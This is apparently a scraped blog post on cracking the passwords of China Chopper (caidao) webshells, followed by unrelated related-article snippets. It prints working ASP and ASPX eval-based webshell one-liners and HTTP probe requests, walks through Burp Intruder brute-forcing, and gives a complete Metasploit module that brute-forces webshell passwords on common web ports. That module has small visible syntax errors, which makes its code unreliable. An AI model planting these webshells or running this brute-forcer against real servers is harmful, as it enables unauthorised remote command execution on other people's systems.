Nixawk
Nixawk

Metasploit - crack chinese caidao php backdoor

Backdoor Request


PHP Backdoor:

   

HTTP Request:
    POST /bk.php
    ....
    op=phpinfo();

If it's successful, phpinfo page will show us.
ASP Backdoor:
    <%eval request("op")%>

HTTP Request:
    POST /bk.asp
    op=execute("response.write(""woo""):response.write(Len(""admin"")):response.write(""woo""):response.    end")

If it's successful, 'woo5woo' page will show us.
ASPX Backdoor:
    <%@ Page Language="Jscript"%><%eval(Request.Item["op"],"unsafe");%>


HTTP Request:
    POST /bk.aspx
    op=Response.Write("woo");Response.Write(1+4);Response.Write("woo")

If it's successful, 'woo5woo' page will show us.


Crack a php backdoor


For Example, we will crack caidao php backdoor step by step.

1. We create a html login form to learn how to use php backdoor.

Metasploit - crack chinese caidao php backdoor_第1张图片

Press  the lable called "Click Here", we will see HTTP request in burpsuite.

Metasploit - crack chinese caidao php backdoor_第2张图片

send it to intruder, and make "adminadmin" as a intruder variable.

Metasploit - crack chinese caidao php backdoor_第3张图片

Bingo ! The password is 'adminadmin'. Now we can do it with metasploit as follow.

Crack backdoors with metasploit


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::AuthBrute

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Chinese Caidao Backdoor Bruteforce',
      'Description'    => 'This module attempts to brute chinese caidao php/asp/aspx backdoor.',
      'Author'         => [ 'Nixawk' ],
      'References'     => 
        [
              [ 'URL', 'http://blog.csdn.net/nixawk/article/details/40430329']
        ],
      'License'        => MSF_LICENSE
    ))

    register_options([
      OptEnum.new('TYPE', [ true, "backdoor type", "PHP", ["PHP", "ASP", "ASPX"] ]),
      OptBool.new('VERBOSE', [ false, 'Enable detailed status messages', false ])
      OptString.new('TARGETURI', [ true, "The URI to authenticate against", "/backdoor.php" ])
    ], self.class)

    register_autofilter_ports([ 80, 443, 8080, 8081, 8000, 8008, 8443, 8444, 8880, 8888 ])
  end

  def backdoor_brute(uri, user, pass, payload, match)
    begin
      data = "&user=#{user}&#{pass}=#{payload}"
      res = send_request_cgi({
          'uri'          =>  uri,
          'method'       =>  "POST",
          'data'         =>  "#{data}"
      })

    rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEOUT
      print_error("#{peer} - Service failed to respond")
      return :abort

    end

    print_status("#{peer} - brute force caidao password: \"#{pass}\"")

    if res and res.code == 200 and res.body =~ /#{match}/mi
        print_good("#{peer} - Successful login: password - \"#{pass}\"")

        return :next_user
    end

    return
  end

  def run_host(ip)
    uri = normalize_uri(target_uri.path)
    script_type = datastore['TYPE']

    junk = Rex::Text::rand_text_alphanumeric(4)
    match = "#{junk}4#{junk}"

    case script_type
    when /php$/mi
      payload = "$_=\"4\";echo \"#{junk}\".$_.\"#{junk}\";";

    when /asp$/mi
      payload = "execute(\"response.write(\"\"#{junk}\"\"):response.write(Len(\"\"#{junk}\"\")):response.write(\"\"#{junk}\"\"):response.end\")"

    when /aspx$/mi
      payload = "Response.Write(\"#{junk}\");Response.Write(Len(\"#{junk}\")});Response.Write(\"#{junk}\")"

    else
      print_error("#{peer} - Backddor type is not support")
      return
    end

    each_user_pass { |user, pass|
      backdoor_brute(uri, user, pass, payload, match)
    }
  end
end 


你可能感兴趣的:(Pentesting)

  • 如何进行渗透测试以提高软件安全性? 咖啡加剁椒.. 软件测试网络安全web安全功能测试软件测试自动化测试程序人生
    对于各种规模的企业和组织来说,软件安全是一个至关重要的问题。随着网络攻击越来越复杂,软件中的漏洞越来越多,确保你的软件安全比以往任何时候都更重要。提高软件安全性的一个有效方法是渗透测试(penetrationtesting)。渗透测试(penetrationtesting),也被称为pentesting或者ethicalhacking,是一种测试软件和IT系统的方法,以确定漏洞和潜在的安全弱点。渗
  • 靶机-basic_pentesting_2 随风随梦自在逍遥 靶机网络安全靶机渗透测试
    basic_pentesting_2arp-scan-l查找靶机IPmasscan192.168.253.154--ports0-65535--rate=10000端口扫描nmap扫描nmap-T5-A-p-192.168.253.154目录扫描80端口http://192.168.253.154/development/dev.txt2018-04-23:I’vebeenmessingwitht
  • 靶机来源-basic_pentesting_1【VX订阅号:0x00实验室】 随风随梦自在逍遥 靶机网络安全靶机渗透测试
    basic_pentesting_1【VX订阅号:0x00实验室】arp-scan扫描靶机IPmasscan192.168.253.153--ports0-65535--rate=10000端口扫描nmap扫描nmap-T5-A-p-192.168.253.15321:ProFTPD1.3.3dirbhttp://192.168.253.153目录扫描http://192.168.253.153/
  • 如何进行渗透测试以提高软件安全性? 测试界柠檬 软件测试网络安全web安全软件测试自动化测试功能测试程序人生
    对于各种规模的企业和组织来说,软件安全是一个至关重要的问题。随着网络攻击越来越复杂,软件中的漏洞越来越多,确保你的软件安全比以往任何时候都更重要。提高软件安全性的一个有效方法是渗透测试(penetrationtesting)。渗透测试(penetrationtesting),也被称为pentesting或者ethicalhacking,是一种测试软件和IT系统的方法,以确定漏洞和潜在的安全弱点。渗
  • Win 8 优化 weixin_30765475 操作系统运维移动开发
    1.关闭家庭组,因为这功能会导致硬盘和CPU处于高负荷状态http://www.qnx.com/products/evaluation/#downloadhttp://drops.wooyun.org/pentesting/15117#more-15117.net深入体验与实战精要pdfhttp://www.jb51.net/os/win10/365385.htmlhttp://blog.csdn
  • basic_pentesting_1 YAy17 Vulnhub安全学习网络安全安全威胁分析web安全
    信息收集#nmap-sn192.168.1.0/24-oNlive.nmapStartingNmap7.94(https://nmap.org)at2023-12-1115:19CSTNmapscanreportfor192.168.1.1Hostisup(0.00023slatency).MACAddress:00:50:56:C0:00:08(VMware)Nmapscanreportfor1
  • 第八章:security testing 暖仔会飞 软件工程学习内容testing
    文章目录SecurityTestingbufferoverflow的例子Fuzzing测试RandomTesting好处坏处Mutation-basedFuzzing好处坏处Generation-basedFuzzing好处坏处MemoryDebuggerUndefinedBehaviors(未定义行为)SecurityTesting渗透测试(或称为pentesting)是指攻击软件以寻找安全漏洞
  • 如何进行渗透测试以提高软件安全性? 测试萧十一郎 自动化测试软件测试工程师软件测试网络安全web安全软件测试1024程序员节功能测试自动化测试
    对于各种规模的企业和组织来说,软件安全是一个至关重要的问题。随着网络攻击越来越复杂,软件中的漏洞越来越多,确保你的软件安全比以往任何时候都更重要。提高软件安全性的一个有效方法是渗透测试(penetrationtesting)。渗透测试(penetrationtesting),也被称为pentesting或者ethicalhacking,是一种测试软件和IT系统的方法,以确定漏洞和潜在的安全弱点。渗
  • 7年经验之谈 —— 如何进行渗透测试以提高软件安全性? 测试界的彭于晏 技术分享自动化测试软件测试测试工具selenium自动化测试测试工程师程序人生
    对于各种规模的企业和组织来说,软件安全是一个至关重要的问题。随着网络攻击越来越复杂,软件中的漏洞越来越多,确保你的软件安全比以往任何时候都更重要。提高软件安全性的一个有效方法是渗透测试(penetrationtesting)。渗透测试(penetrationtesting),也被称为pentesting或者ethicalhacking,是一种测试软件和IT系统的方法,以确定漏洞和潜在的安全弱点。渗
  • github上有什么好的渗透测试软件?(Git_Pentesting_Toolkit) csdn产品小助手
    简介经常看我的博客的同学都知道,我所说得渗透测试软件一般都是在GitHub上下载的,所以有人就写出了一个下载脚本(Git_Pentesting_Toolkit)来批量下载那些优秀的渗透测试脚本下载老规矩clone下来gitclonehttps://github.com/ANK1036Official/Git_Pentesting_Toolkit.gitcdGit_Pentesting_Toolki
  • OSCP Learning Notes - Privilege Escalation weixin_30642561
    PrivilegeEscalationDownloadtheBasic-pentestingvitualmationfromthefollowingwebsite:https://www.vulnhub.com/entry/basic-pentesting-1,216/1.Scanthetargetserverusingnmap.nmap-Pn-sS--stats-every3m--max-sca
  • Linux 机器的渗透测试命令备忘表 ZHAICAN linux
    如下是一份Linux机器的渗透测试备忘录,是在后期开发期间或者执行命令注入等操作时的一些典型命令,设计为测试人员进行本地枚举检查之用。此外,你还可以从这儿(https://gbhackers.com/category/pentesting/)阅读到许多关于渗透测试的文章。命令描述netstat-tulpn在Linux中显示对应了进程ID(PID)的网络端口。watchss-stplu通过套接字实时
  • Introducing 35 Pentesting Tools Used for Web Vulnerability Assessment kezhen 渗透测试相关
    转自:http://blog.rootcon.org/2012/03/introducing-35-pentesting-tools-used.html1.w3afw3aforWebApplicationAttackandAuditFrameworkisanopensourcepenetrationtestingtoolforfindingwebvulnerabilitiesandanexploi
  • 渗透测试 VikiShare
    一、概念渗透测试(pentesting)&漏洞评估(vulnerabilityassessment)1.漏洞评估:检查系统及服务是否存在潜在的安全问题2.渗透测试:通过执行漏洞和攻击系统来证明有安全隐患白帽(whitehathacking)$黑帽(hacking)1.两者之间最直接的区别就是是否经过授权。2.白帽的目的是帮助机构提高安全性,黑帽的目的是通过敲诈报复等手段获取利益。【袁炜&世纪佳缘】
  • basic-pentesting-1 靶机提权 banacyo14206
    原文链接:http://www.cnblogs.com/micr067/p/11396105.html原文地址:https://www.payload.com.cn/basic-pentesting-1下载地址:https://www.vulnhub.com/entry/basic-pentesting-1,216/提权辅助工具LinEnum下载:https://download.csdn.net
  • basic-pentesting-1 靶机提权 Micr067
    原文地址:https://www.payload.com.cn/basic-pentesting-1下载地址:https://www.vulnhub.com/entry/basic-pentesting-1,216/提权辅助工具LinEnum下载:https://download.csdn.net/download/weixin_41082546/11609409提权辅助工具linuxprivch
  • BASIC-PENTESTING-1 靶机提权 Micr067
    basic-pentesting-1https://www.vulnhub.com/entry/basic-pentesting-1,216/获取ip地址端口扫描,服务识别根据服务版本搜索相关漏洞通过查看漏洞利用代码我们知道该漏洞利用模块在msf中已有于是使用msf搜索漏洞模块并利用useexploit/unix/ftp/proftpd_133c_backdoorsetrhosts192.168.
  • (解读)什么是渗透测试(Penetration Testing)? 梅森上校 AgileTesting软件测试方法论
    (解读)什么是渗透测试(PenetrationTesting)?渗透测试(PenetrationTesting),也称为PenTesting,是测试计算机系统、网络或Web应用程序以发现攻击者可能利用的安全漏洞的实践。渗透测试可以通过软件应用自动化或手动执行。无论哪种方式,该过程都包括在测试之前收集关于目标的信息,识别可能的入口点,试图闯入(虚拟的或真实的)并报告结果。让我们看看WIKI上的英文解
  • 如何渗透测试以太坊 dApps FLy_鹏程万里 【区块链】————以太坊安全
    英文原文:https://arvanaghi.com/blog/pentesting-ethereum-dapps/一、前言所谓的以太坊(Ethereum)去中心化应用(decentralizedapplication,dApp),指的就是基于共识协议(consensusprotocol)交互的应用。在本文中,我们选择的目标为dApp最常见的某类应用场景:与一个或者多个智能合约(smartcont
  • 渗透测试工程师的17个常用工具 还有专家告诉你如何成为渗透测试人员—转载绿盟 花米徐 安全
    渗透测试工程师的17个常用工具还有专家告诉你如何成为渗透测试人员发布时间:2017年9月15日07:51浏览量:2231渗透测试(pentesting)是由安全专家进行的一项安全性测试,其目的是为了在攻击者攻击之前发现系统中的漏洞。它需要聪明的思考、耐心和一点点运气。此外,大多数安全专家将需要一些具体的工具来帮助完成这项工作。最近,外媒跟一些民间组织和一些安全专家进行了沟通,看看他们最喜欢用哪些工
  • iOS Tutorial – Dumping the Application Heap from Memory application
     Source:https://blog.netspi.com/ios-tutorial-dumping-the-application-heap-from-memory/ An essential part of pentesting iOS applications is analyzing the runtime of the application. In this b
  • iOS Application Security application
    文章分A,B,C,D 4个部分。 A) iOS Application Security   下面介绍iOS应用安全,如何分析和动态修改app。 1)iOS Application security Part 1 – Setting up a mobile pentesting platform Part1介绍如何在越狱的设备上搭建用来测试iOS安全的环境。 2
  • 逆向分析实战 分析
    逆向实战系列文章 http://resources.infosecinstitute.com/ios-application-security-part-1-setting-up-a-mobile-pentesting-platform/#article http://resources.infosecinstitute.com/ios-application-security-part-5-
  • WebApp Pentesting Web渗透演练平台 kezhen 渗透测试相关
    转自:http://hi.baidu.com/oracledba/item/9f7be51ee6a7fbe45e53b16d1、什么是WebAppPentestingWebAppPentesting,由PentesterLab出品。官方给自己的定义是一个简单又十分有效学习渗透测试的演练平台。它提供诸多的漏洞系统以供网络安全发烧友进行测试和让黑阔们更加深刻地且透彻理解“漏洞”。跟传统的DVWA和We
  • Pentesting In Local Networks [Unix] hackfreer unix职场休闲Networkspentesting
    --------------------------------------- |Teamph0x90bicproudlypresents| |PentestinginLocalNetworksPart1| |ReconaissanceandARPPoisoning| --------------------------------------- INTRODUCTION Th
  • Pentesting TIPs hackfreer 职场tips休闲hackfreer
    1,ecshopmagic_quotes_gpc=Off/js/calendar.php?lang=../index.php%00.注册然后上传gif欺骗文件 http://www.lpboke.com/js/calendar.php?lang=../data/feedbackimg/6_20101228vyrpbg.gif%00 2,dede5.3以下找后台include/dialog/sele
  • web报表工具FineReport常见的数据集报错错误代码和解释 老A不折腾 web报表finereport代码可视化工具
    在使用finereport制作报表,若预览发生错误,很多朋友便手忙脚乱不知所措了,其实没什么,只要看懂报错代码和含义,可以很快的排除错误,这里我就分享一下finereport的数据集报错错误代码和解释,如果有说的不准确的地方,也请各位小伙伴纠正一下。   NS-war-remote=错误代码\:1117 压缩部署不支持远程设计 NS_LayerReport_MultiDs=错误代码
  • Java的WeakReference与WeakHashMap bylijinnan java弱引用
    首先看看 WeakReference wiki 上 Weak reference 的一个例子: public class ReferenceTest { public static void main(String[] args) throws InterruptedException { WeakReference r = new Wea
  • Linux——(hostname)主机名与ip的映射 eksliang linuxhostname
    一、 什么是主机名 无论在局域网还是INTERNET上,每台主机都有一个IP地址,是为了区分此台主机和彼台主机,也就是说IP地址就是主机的门牌号。但IP地址不方便记忆,所以又有了域名。域名只是在公网(INtERNET)中存在,每个域名都对应一个IP地址,但一个IP地址可有对应多个域名。域名类型 linuxsir.org 这样的; 主机名是用于什么的呢? 答:在一个局域网中,每台机器都有一个主
  • oracle 常用技巧 18289753290
    oracle常用技巧 ①复制表结构和数据   create table  temp_clientloginUser as   select distinct userid from tbusrtloginlog ②仅复制数据 如果表结构一样 insert into  mytable  select  * &nb
  • 使用c3p0数据库连接池时出现com.mchange.v2.resourcepool.TimeoutException 酷的飞上天空 exception
    有一个线上环境使用的是c3p0数据库,为外部提供接口服务。最近访问压力增大后台tomcat的日志里面频繁出现 com.mchange.v2.resourcepool.TimeoutException: A client timed out while waiting to acquire a resource from com.mchange.v2.resourcepool.BasicResou
  • IT系统分析师如何学习大数据 蓝儿唯美 大数据
    我是一名从事大数据项目的IT系统分析师。在深入这个项目前需要了解些什么呢?学习大数据的最佳方法就是先从了解信息系统是如何工作着手,尤其是数据库和基础设施。同样在开始前还需要了解大数据工具,如Cloudera、Hadoop、Spark、Hive、Pig、Flume、Sqoop与Mesos。系 统分析师需要明白如何组织、管理和保护数据。在市面上有几十款数据管理产品可以用于管理数据。你的大数据数据库可能
  • spring学习——简介 a-john spring
    Spring是一个开源框架,是为了解决企业应用开发的复杂性而创建的。Spring使用基本的JavaBean来完成以前只能由EJB完成的事情。然而Spring的用途不仅限于服务器端的开发,从简单性,可测试性和松耦合的角度而言,任何Java应用都可以从Spring中受益。其主要特征是依赖注入、AOP、持久化、事务、SpringMVC以及Acegi Security 为了降低Java开发的复杂性,
  • 自定义颜色的xml文件 aijuans xml
    <?xml version="1.0" encoding="utf-8"?> <resources> <color name="white">#FFFFFF</color> <color name="black">#000000</color> &
  • 运营到底是做什么的? aoyouzi 运营到底是做什么的?
    文章来源:夏叔叔(微信号:woshixiashushu),欢迎大家关注!很久没有动笔写点东西,近些日子,由于爱狗团产品上线,不断面试,经常会被问道一个问题。问:爱狗团的运营主要做什么?答:带着用户一起嗨。为什么是带着用户玩起来呢?究竟什么是运营?运营到底是做什么的?那么,我们先来回答一个更简单的问题——互联网公司对运营考核什么?以爱狗团为例,绝大部分的移动互联网公司,对运营部门的考核分为三块——用
  • js面向对象类和对象 百合不是茶 js面向对象函数创建类和对象
    接触js已经有几个月了,但是对js的面向对象的一些概念根本就是模糊的,js是一种面向对象的语言 但又不像java一样有class,js不是严格的面向对象语言 ,js在java web开发的地位和java不相上下  ,其中web的数据的反馈现在主流的使用json,json的语法和js的类和属性的创建相似   下面介绍一些js的类和对象的创建的技术   一:类和对
  • web.xml之资源管理对象配置 resource-env-ref bijian1013 javaweb.xmlservlet
    resource-env-ref元素来指定对管理对象的servlet引用的声明,该对象与servlet环境中的资源相关联 <resource-env-ref> <resource-env-ref-name>资源名</resource-env-ref-name> <resource-env-ref-type>查找资源时返回的资源类
  • Create a composite component with a custom namespace sunjing
    https://weblogs.java.net/blog/mriem/archive/2013/11/22/jsf-tip-45-create-composite-component-custom-namespace   When you developed a composite component the namespace you would be seeing would
  • 【MongoDB学习笔记十二】Mongo副本集服务器角色之Arbiter bit1129 mongodb
     一、复本集为什么要加入Arbiter这个角色 回答这个问题,要从复本集的存活条件和Aribter服务器的特性两方面来说。 什么是Artiber? An arbiter does not have a copy of data set and cannot become a primary. Replica sets may have arbiters to add a
  • Javascript开发笔记 白糖_ JavaScript
    获取iframe内的元素 通常我们使用window.frames["frameId"].document.getElementById("divId").innerHTML这样的形式来获取iframe内的元素,这种写法在IE、safari、chrome下都是通过的,唯独在fireforx下不通过。其实jquery的contents方法提供了对if
  • Web浏览器Chrome打开一段时间后,运行alert无效 bozch Webchormealert无效
    今天在开发的时候,突然间发现alert在chrome浏览器就没法弹出了,很是怪异。 试了试其他浏览器,发现都是没有问题的。 开始想以为是chorme浏览器有啥机制导致的,就开始尝试各种代码让alert出来。尝试结果是仍然没有显示出来。 这样开发的结果,如果客户在使用的时候没有提示,那会带来致命的体验。哎,没啥办法了 就关闭浏览器重启。   结果就好了,这也太怪异了。难道是cho
  • 编程之美-高效地安排会议 图着色问题 贪心算法 bylijinnan 编程之美
    import java.util.ArrayList; import java.util.Collections; import java.util.List; import java.util.Random; public class GraphColoringProblem { /**编程之美 高效地安排会议 图着色问题 贪心算法 * 假设要用很多个教室对一组
  • 机器学习相关概念和开发工具 chenbowen00 算法matlab机器学习
    基本概念: 机器学习(Machine Learning, ML)是一门多领域交叉学科,涉及概率论、统计学、逼近论、凸分析、算法复杂度理论等多门学科。专门研究计算机怎样模拟或实现人类的学习行为,以获取新的知识或技能,重新组织已有的知识结构使之不断改善自身的性能。 它是人工智能的核心,是使计算机具有智能的根本途径,其应用遍及人工智能的各个领域,它主要使用归纳、综合而不是演绎。 开发工具 M
  • [宇宙经济学]关于在太空建立永久定居点的可能性 comsci 经济
           大家都知道,地球上的房地产都比较昂贵,而且土地证经常会因为新的政府的意志而变幻文本格式........        所以,在地球议会尚不具有在太空行使法律和权力的力量之前,我们外太阳系统的友好联盟可以考虑在地月系的某些引力平衡点上面,修建规模较大的定居点
  • oracle 11g database control 证书错误 daizj oracle证书错误oracle 11G 安装
    oracle 11g database control 证书错误  win7 安装完oracle11后打开 Database control 后,会打开em管理页面,提示证书错误,点“继续浏览此网站”,还是会继续停留在证书错误页面 解决办法: 是 KB2661254 这个更新补丁引起的,它限制了 RSA 密钥位长度少于 1024 位的证书的使用。具体可以看微软官方公告:
  • Java I/O之用FilenameFilter实现根据文件扩展名删除文件 游其是你 FilenameFilter
    在Java中,你可以通过实现FilenameFilter类并重写accept(File dir, String name) 方法实现文件过滤功能。 在这个例子中,我们向你展示在“c:\\folder”路径下列出所有“.txt”格式的文件并删除。 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
  • C语言数组的简单以及一维数组的简单排序算法示例,二维数组简单示例 dcj3sjt126com carray
    # include <stdio.h> int main(void) { int a[5] = {1, 2, 3, 4, 5}; //a 是数组的名字 5是表示数组元素的个数,并且这五个元素分别用a[0], a[1]...a[4] int i; for (i=0; i<5; ++i) printf("%d\n",
  • PRIMARY, INDEX, UNIQUE 这3种是一类 PRIMARY 主键。 就是 唯一 且 不能为空。 INDEX 索引,普通的 UNIQUE 唯一索引 dcj3sjt126com primary
    PRIMARY, INDEX, UNIQUE 这3种是一类PRIMARY 主键。 就是 唯一 且 不能为空。INDEX 索引,普通的UNIQUE 唯一索引。 不允许有重复。FULLTEXT 是全文索引,用于在一篇文章中,检索文本信息的。举个例子来说,比如你在为某商场做一个会员卡的系统。这个系统有一个会员表有下列字段:会员编号   INT会员姓名  
  • java集合辅助类 Collections、Arrays shuizhaosi888 CollectionsArraysHashCode
      Arrays、Collections   1 )数组集合之间转换 public static <T> List<T> asList(T... a) { return new ArrayList<>(a); }      a)Arrays.asL
  • Spring Security(10)——退出登录logout 234390216 logoutSpring Security退出登录logout-urlLogoutFilter
           要实现退出登录的功能我们需要在http元素下定义logout元素,这样Spring Security将自动为我们添加用于处理退出登录的过滤器LogoutFilter到FilterChain。当我们指定了http元素的auto-config属性为true时logout定义是会自动配置的,此时我们默认退出登录的URL为“/j_spring_secu
  • 透过源码学前端 之 Backbone 三 Model 逐行分析JS源代码 backbone源码分析js学习
    Backbone 分析第三部分  Model 概述: Model 提供了数据存储,将数据以JSON的形式保存在 Model的 attributes里, 但重点功能在于其提供了一套功能强大,使用简单的存、取、删、改数据方法,并在不同的操作里加了相应的监听事件, 如每次修改添加里都会触发 change,这在据模型变动来修改视图时很常用,并且与collection建立了关联。
  • SpringMVC源码总结(七)mvc:annotation-driven中的HttpMessageConverter 乒乓狂魔 springMVC
    这一篇文章主要介绍下HttpMessageConverter整个注册过程包含自定义的HttpMessageConverter,然后对一些HttpMessageConverter进行具体介绍。 HttpMessageConverter接口介绍: public interface HttpMessageConverter<T> { /** * Indicate
  • 分布式基础知识和算法理论 bluky999 算法zookeeper分布式一致性哈希paxos
      分布式基础知识和算法理论 BY [email protected] 本文永久链接:http://nodex.iteye.com/blog/2103218   在大数据的背景下,不管是做存储,做搜索,做数据分析,或者做产品或服务本身,面向互联网和移动互联网用户,已经不可避免地要面对分布式环境。笔者在此收录一些分布式相关的基础知识和算法理论介绍,在完善自我知识体系的同
  • Android Studio的.gitignore以及gitignore无效的解决 bell0901 androidgitignore
      github上.gitignore模板合集,里面有各种.gitignore : https://github.com/github/gitignore   自己用的Android Studio下项目的.gitignore文件,对github上的android.gitignore添加了       # OSX files      //mac os下      .DS_Store
  • 成为高级程序员的10个步骤 tomcat_oracle 编程
    What 软件工程师的职业生涯要历经以下几个阶段:初级、中级,最后才是高级。这篇文章主要是讲如何通过 10 个步骤助你成为一名高级软件工程师。   Why 得到更多的报酬!因为你的薪水会随着你水平的提高而增加 提升你的职业生涯。成为了高级软件工程师之后,就可以朝着架构师、团队负责人、CTO 等职位前进 历经更大的挑战。随着你的成长,各种影响力也会提高。
  • mongdb在linux下的安装 xtuhcy mongodblinux
    一、查询linux版本号: lsb_release -a  LSB Version:    :base-4.0-amd64:base-4.0-noarch:core-4.0-amd64:core-4.0-noarch:graphics-4.0-amd64:graphics-4.0-noarch:printing-4.0-amd64:printing-4.0-noa
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他